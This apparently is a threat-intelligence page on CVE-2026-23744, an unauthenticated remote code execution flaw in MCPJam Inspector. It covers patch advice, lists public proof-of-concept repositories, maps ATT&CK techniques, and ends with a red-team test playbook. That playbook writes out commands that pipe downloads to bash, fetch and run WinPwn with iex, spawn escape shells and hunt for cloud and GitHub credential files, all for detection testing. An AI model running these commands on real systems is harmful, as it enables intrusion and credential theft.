CVE-2026-23744

CRITICAL EXPLOIT POC TTE 3d Pub 16/01 Upd 16/01

Overview

This vulnerability is a remote code execution (RCE) caused by improper access control in MCPJam inspector versions 1.4.2 and earlier. The root cause is that the application listens on all network interfaces (0.0.0.0) by default instead of localhost (127.0.0.1), exposing an HTTP endpoint that triggers the installation of an MCP server without authentication or validation. This allows unauthenticated external users to invoke server installation routines remotely via crafted HTTP requests.

Vulnerability Description

MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch.

Impact

An unauthenticated attacker with network access to the MCPJam inspector service can remotely execute arbitrary code by triggering the MCP server installation process. Since the service listens on all interfaces by default, exploitation does not require local access or user interaction. This can lead to full system compromise, data breach, or service disruption. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that no privileges or user interaction are needed for exploitation.

Solution

Users should upgrade MCPJam inspector to version 1.4.3 or later, which includes a patch restricting the listening interface to localhost and implements authentication controls. Detailed remediation steps and patch information are available in the official GitHub advisory GHSA-232v-j27c-5pp6 and the associated commit e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a. No alternative workarounds are documented.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the MCPJam inspector poses a significant risk due to its nature as a remote code execution (RCE) flaw. This issue arises from the platform's default configuration, where it listens on all network interfaces (0.0.0.0) instead of being restricted to localhost (127.0.0.1). This misconfiguration allows an attacker to send a specially crafted HTTP request to the server, which can trigger the installation of an MCP server. Once the installation process is initiated, the attacker gains the ability to execute arbitrary code on the affected system, potentially leading to a full compromise of the server.

Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage network access to the MCPJam inspector, which may be exposed to the internet or an internal network. By sending a maliciously crafted HTTP request, the attacker can initiate the installation process without any authentication or authorization checks, as the default settings do not impose restrictions on incoming requests. This scenario can be particularly concerning in environments where the MCPJam inspector is deployed in a production setting, as it could allow for widespread exploitation if multiple instances are running.

The real-world impact of this vulnerability is substantial, especially for organizations that rely on the MCPJam inspector for local-first development. The ability to execute arbitrary code remotely can lead to data breaches, unauthorized access to sensitive information, and potential disruption of services. Businesses may face severe reputational damage, financial losses, and regulatory repercussions if sensitive data is compromised or if their systems are used to launch further attacks. Additionally, the high CVSS score of 9.8 indicates that this vulnerability is critical and should be prioritized for immediate remediation.

To detect and mitigate this vulnerability, organizations should first ensure that they are using the patched version of the MCPJam inspector (version 1.4.3 or later). Regularly updating software and applying security patches is a fundamental practice in cybersecurity hygiene. Furthermore, network segmentation should be implemented to limit access to the MCPJam inspector, ensuring that it is only reachable by trusted internal systems. Employing firewalls to restrict incoming traffic and monitoring network activity for unusual patterns can also help in identifying potential exploitation attempts. Organizations should conduct regular security assessments and penetration testing to evaluate their defenses against such vulnerabilities.

In conclusion, the remote code execution vulnerability in the MCPJam inspector represents a critical threat that can have far-reaching implications for affected organizations. By understanding the technical details, potential attack vectors, and real-world impacts, businesses can take proactive measures to protect their systems. Implementing robust detection and mitigation strategies, along with maintaining an up-to-date software environment, is essential for safeguarding against this and similar vulnerabilities in the future.




CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-23744, accompanied by the emergence of multiple new proof-of-concept exploits circulating on public repositories. Our telemetry indicates that adversaries are increasingly leveraging these tools to automate and scale remote code execution attacks against vulnerable MCPJam inspector instances. This expansion in the exploit landscape, coupled with a slight uptick in the EPSS score, signals growing attacker confidence and operational momentum. For defenders, this trend underscores an elevated risk of compromise, particularly in environments where MCPJam inspector remains unpatched or exposed to external networks. Consequently, the threat level associated with this vulnerability has intensified, reflecting a more active and accessible exploitation environment that demands heightened vigilance.



Update 2 — June 19, 2026

CSURFACE threat intelligence has detected a modest but consistent increase in exploitation attempts targeting CVE-2026-23744, accompanied by the emergence of additional publicly available proof-of-concept exploits. Our telemetry indicates that threat actors are refining and expanding their toolsets to automate attacks against vulnerable MCPJam inspector instances. The elevated EPSS score reflects growing attacker confidence and a broader operational footprint. This development is significant because it lowers the barrier for less sophisticated adversaries to conduct remote code execution attacks, increasing the likelihood of successful intrusions in environments where MCPJam inspector remains exposed and unpatched. Consequently, the threat level associated with this vulnerability has risen from elevated to high, underscoring the urgent need for defenders to maintain heightened situational awareness and prioritize mitigation efforts.



Update 3 — July 08, 2026

CSURFACE threat intelligence has identified the publication of a new ExploitDB entry for CVE-2026-23744, marking a critical shift in the exploit landscape. While telemetry indicates a significant reduction in detection activity, the availability of multiple new proof-of-concept exploits on public repositories has broadened the attack surface and lowered the technical barrier for adversaries. This development is particularly consequential given the vulnerability’s default exposure on all network interfaces, enabling remote exploitation without authentication. The stable EPSS score near the 0.98th percentile reflects persistent risk despite the decline in observed exploitation attempts, suggesting that threat actors may be refining their tactics or operating with greater stealth. Consequently, the threat level remains critical, with the expanded exploit toolkit increasing the likelihood of opportunistic attacks and complicating defensive postures for organizations that have not yet applied the patch.



Update 4 — July 17, 2026

CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-23744, accompanied by a broadening of the exploit landscape with several new proof-of-concept tools publicly released. Our telemetry indicates a significant uptick in detection events, reflecting increased adversary engagement and likely testing or operational use of these exploits. The elevated EPSS score, now approaching the 0.44 range, underscores a growing likelihood of successful exploitation attempts in the wild. This evolution matters because the expanding availability of exploitation resources lowers the barrier to entry for less sophisticated threat actors, potentially accelerating opportunistic attacks against unpatched MCPJam inspector deployments. Consequently, the threat environment has intensified, warranting heightened vigilance as the risk of remote code execution incidents rises in both volume and sophistication.



Update 5 — July 25, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-23744, driven by the emergence of new proof-of-concept tools that have broadened the exploit landscape. Our telemetry indicates a sustained upward trend in detection events, reflecting increased attacker interest and operational attempts to leverage the unauthenticated remote code execution vulnerability in MCPJam inspector versions prior to 1.4.3. The EPSS score has inched higher, reinforcing the growing probability of successful exploitation in the wild. This evolution is significant because the proliferation of publicly available exploit code lowers technical barriers, enabling a wider range of threat actors—including less sophisticated opportunists—to mount attacks. Consequently, the threat level has intensified from elevated to high, underscoring an urgent need for defenders to prioritize monitoring and response efforts around this vulnerability.

Affected Products (1)

Vendor Product Version CPE
mcpjam Mcpjam Inspector All cpe:2.3:a:mcpjam:inspector:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

ExploitDB (1)

Title Author Type Platform Date Link
MCPJam Inspector - Remote Code Execution Diamorphine webapps multiple - View

GitHub PoCs (49)

Repository Author Stars Forks Date Link
suljov/CVE-2026-23744-Remote-Code-Execution-POC
MCPJam inspector contains a remote code execution
suljov 11 1 2026-03-21 View
boroeurnprach/CVE-2026-23744-PoC
CVE-2026-23744 - Versions 1.4.2 and earlier of MCPJam inspector are vulnerable to remote code execution (RCE). Because t...
boroeurnprach 9 2 2026-01-20 View
ibreakthingsforaliving/CVE-2026-23744-PoC
CVE-2026-23744 - Versions 1.4.2 and earlier of MCPJam inspector are vulnerable to remote code execution (RCE). Because t...
ibreakthingsforaliving 8 2 2026-01-20 View
CerberusMrXi/CVE-2026-23744-MCPJam-Exploit
A proof-of-concept exploit for CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE) vulnerability. This tool de...
CerberusMrXi 8 1 2026-07-14 View
thisisish/HTB-DevHub
CVE-2026-23744 RCE + Privilege Escalation
thisisish 4 0 2026-05-31 View
luiskrnr/exploit-CVE-2026-23744
MCPJam Inspector is a local-first development platform for MCP servers. In versions 1.4.2 (and earlier), a RCE flaw lets...
luiskrnr 3 0 2026-04-10 View
FrenzisRed/CVE-2026-23744
CVE-2026-23744 - MCPJam inspector Remote-Code-Execution: Proof Of Concept (POC
FrenzisRed 3 0 2026-03-23 View
Mluex0/CVE-2026-23744-PoC
CVE-2026-23744 is an unauthenticated command injection in MCPJam Inspector ≤1.4.2 via /api/mcp/connect. This POC exploit...
Mluex0 2 0 2026-08-10 View
ozcanpng/CVE-2026-23744
CVE-2026-23744 MCPJam Inspector unauthenticated RCE PoC
ozcanpng 1 0 2026-07-11 View
alisster00/CVE-2026-23744-RCE
This utility was created during research involving MCPJam v1.4.2. The application exposes an API endpoint that accepts a...
alisster00 1 0 2026-06-02 View
SrGinebras/CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2
SrGinebras 1 0 2026-05-31 View
SuriyaBoon/DevHub-HackTheBox-ss11
HTB Season 11 — DevHub Writeup Exploiting CVE-2026-23744 (MCPJam Inspector unauthenticated RCE via /api/mcp/connect) to...
SuriyaBoon 1 0 2026-05-30 View
InzegoSec/CVE-2026-23744
Exploit to MCPJam Inspector <=1.4.2
InzegoSec 1 0 2026-03-24 View
ctzisme/CVE-2026-23744
PoC for CVE-2026-23744, demonstrating an unauthenticated RCE in MCPJam Inspector (<= 1.4.2).
ctzisme 1 0 2026-03-26 View
yassertioursi/htb-kobold-writeup
Hack The Box — Kobold writeup. Exploiting CVE-2026-23744 (MCPJam Inspector unauthenticated RCE) to gain initial access a...
yassertioursi 1 0 2026-03-25 View
0xg00se/CVE-2026-23744-script
Exploit script for CVE-2026-23744
0xg00se 1 0 2026-03-27 View
itsC1SCO/mcpjam-to-root
From MCPJam Inspector RCE to root — CVE-2026-23744, JupyterLab token disclosure, kernel execution, and OPSMCP privilege ...
itsC1SCO 0 0 2026-08-23 View
sonnelon/CVE-2026-23744-PoC
The poc of CVE-2026-23744
sonnelon 0 0 2026-08-10 View
nullRoot-Red/CVE-2026-23744
Proof-of-concept and offensive security research analyzing CVE-2026-23744 (MCPJam Inspector Unauthenticated RCE, Patched...
nullRoot-Red 0 0 2026-07-23 View
0x77FSec/CVE-2026-23744
0x77FSec 0 0 2026-07-10 View
diamorphine666/CVE-2026-23744-exploit
Exploit for MCPJam Inspector - Remote Code Execution (CVE-2026-23744)
diamorphine666 0 0 2026-07-04 View
timgad794/DevHub-HTB-Walkthrough
Hack The Box - DevHub Machine Walkthrough (Medium Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, Root Privilege Escal...
timgad794 0 0 2026-06-28 View
daemoncibsec/mcpExec
POC for CVE-2026-23744 for a python revshell
daemoncibsec 0 0 2026-06-22 View
rohit-sundar/cve-2026-23744
rohit-sundar 0 0 2026-06-14 View
kennedy-aikohi/mcpjam-cve-2026-23744-validator
kennedy-aikohi 0 0 2026-06-09 View
oryk0/CVE-2026-23744
CVE-2026-23744 Reverse shell
oryk0 0 0 2026-06-06 View
keeieb79/CVE-2026-23744-poc
cve-2026-23744 python exploit
keeieb79 0 0 2026-06-05 View
Dahalsamir/CVE-2026-23744-MCPJAM-RCE-exploit
This Python proof-of-concept targets a vulnerable MCP (Model Context Protocol) service exposed by the target application...
Dahalsamir 0 0 2026-06-05 View
avivyap/CVE-2026-23744
CVE-2026-23744
avivyap 0 0 2026-06-04 View
jf-gondim/mcp-pwn
PoC exploit for CVE-2026-23744 — unauthenticated RCE in MCPJam Inspector via unvalidated serverConfig command injection ...
jf-gondim 0 0 2026-06-03 View
MrR0b0t19/CVE-2026-23744-PoC
MrR0b0t19 0 0 2026-06-02 View
TYehan/CVE-2026-23744
Proof of Concept exploit for CVE-2026-23744: Remote Code Execution vulnerability in MCPJam Inspector <= 1.4.2
TYehan 0 0 2026-06-02 View
m2sousa/CVE-2026-23744
CVE-2026-23744 Proof-of-concept.
m2sousa 0 0 2026-06-02 View
afifudinmtop/MCPJam-Inspector-1.4.2-Remote-Code-Execution-CVE-2026-23744
afifudinmtop 0 0 2026-06-01 View
Least-Significant-Bit/CVE-2026-23744
Remote Code Execution in MCPJam 1.4.2 and older
Least-Significant-Bit 0 0 2026-05-31 View
sbouabid-sec/CVE-2026-23744-POC
CVE-2026-23744 — Proof of concept exploit for an unauthenticated Remote Code Execution vulnerability in MCPJam Inspector...
sbouabid-sec 0 0 2026-05-31 View
p1ctur3p3rf3ct/CVE-2026-23744
CVE-2026-23744 PoC
p1ctur3p3rf3ct 0 0 2026-05-31 View
w3nch/CVE-2026-23744
CVE-2026-23744 - Versions 1.4.2 and earlier of MCPJam inspector
w3nch 0 0 2026-05-30 View
ledksv/kobold
Kobold — HackTheBox Medium writeup: CVE-2026-23744, PrivateBin LFI, Docker group escape to root
ledksv 0 0 2026-05-10 View
d0x-awrqxavc/CVE-2026-23744
d0x-awrqxavc 0 0 2026-03-28 View
d0x-awrqxavc/CVE-2026-23744-HACKTHEBOX
d0x-awrqxavc 0 0 2026-03-28 View
z4yd3/PoC-CVE-2026-23744
Remote Code Execution on MCPJam Inspector <= 1.4.2
z4yd3 0 0 2026-03-25 View
H1sok444/CVE-2026-23744-PoC
H1sok444 0 0 2026-03-22 View
rootdirective-sec/CVE-2026-23744-Lab
rootdirective-sec 0 0 2026-02-16 View
CyLock11/CVE-2026-23744
CVE-2026-23744 - MCP Connect RCE via Unauthenticated Command Injection
CyLock11 0 0 2026-03-29 View
d3vn0mi/CVE-2026-23744-POC
Python PoC for CVE-2026-23744, unauthenticated RCE in MCP servers via the /api/mcp/connect serverConfig command field (d...
d3vn0mi 0 0 2026-03-28 View
fcjaviergarcia/CVE-2026-23744-POC
Proof of Concept (PoC) exploit for CVE-2026-23744, a vulnerability affecting MCPJam Inspector that allows remote command...
fcjaviergarcia 0 0 2026-03-27 View
AhmadF77/CVE-2026-23744
python script for exploiting CVE-2026-23744
AhmadF77 0 0 2026-03-27 View
fckoo/mcpjaminspector-unauth-rce
CVE-2026-23744 RCE in MCPJam inspector <= 1.4.2
fckoo 0 0 2026-03-22 View
Exploited in Wild NOT DETECTED
Ransomware NOT ASSOCIATED
Attacker Interest VERY LOW
Sightings Few sightings

Threat Feed

32 events
2026-08-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-24
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-17
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-16
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-01-20
PoC Published (49 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Exploit Published (1 ExploitDB, 0 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Remote Code Execution
83% rce
Code Injection
69% code_injection
Authentication Bypass
48% auth_bypass
OS Command Injection
45% command_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-166 Force the System to Reset Values
70%
Medium
CAPEC-12 Choosing Message Identifier
30%
High High
CAPEC-216 Communication Channel Manipulation
30%
CAPEC-36 Using Unpublished Interfaces or Functionality
30%
Medium High
CAPEC-62 Cross Site Request Forgery
30%
High Very High

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
